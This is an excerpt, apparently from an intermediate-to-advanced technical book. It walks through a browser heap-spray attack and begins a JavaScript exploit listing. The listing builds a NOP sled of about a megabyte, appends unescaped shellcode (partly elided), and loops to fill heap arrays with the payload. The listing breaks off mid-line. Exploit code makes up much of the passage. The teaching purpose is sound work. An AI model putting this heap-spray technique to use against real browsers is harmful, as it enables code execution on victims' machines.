July 2018
Intermediate to advanced
452 pages
11h 51m
English
There are two distinct phases to this attack, so they'll be coded distinctly. Phase One is the heap spray. In our code, we'll define a function that declares two variables for the NOP sled and the shellcode, a while loop to grow the NOP sled, and then it concatenates the two. Finally, a for loop will distribute the naughty bytes into the heap. Let's take a look:
<html> <head> <script> var arr = []; function sprayer() { var shcode = unescape("%ue8fc%u0082%u0000%u8960%u31e5%u64c0...[snip] ...uc175%ubbc3%ub5f0%u56a2%u006a%uff53%u41d5") var nopsled = unescape("%u9090%u9090"); while(nopsled.length <= 0x100000 - shcode.length) { nopsled += nopsled; } nopsled += shcode; for(z = 0; z < 200; z++) { arr[z] ...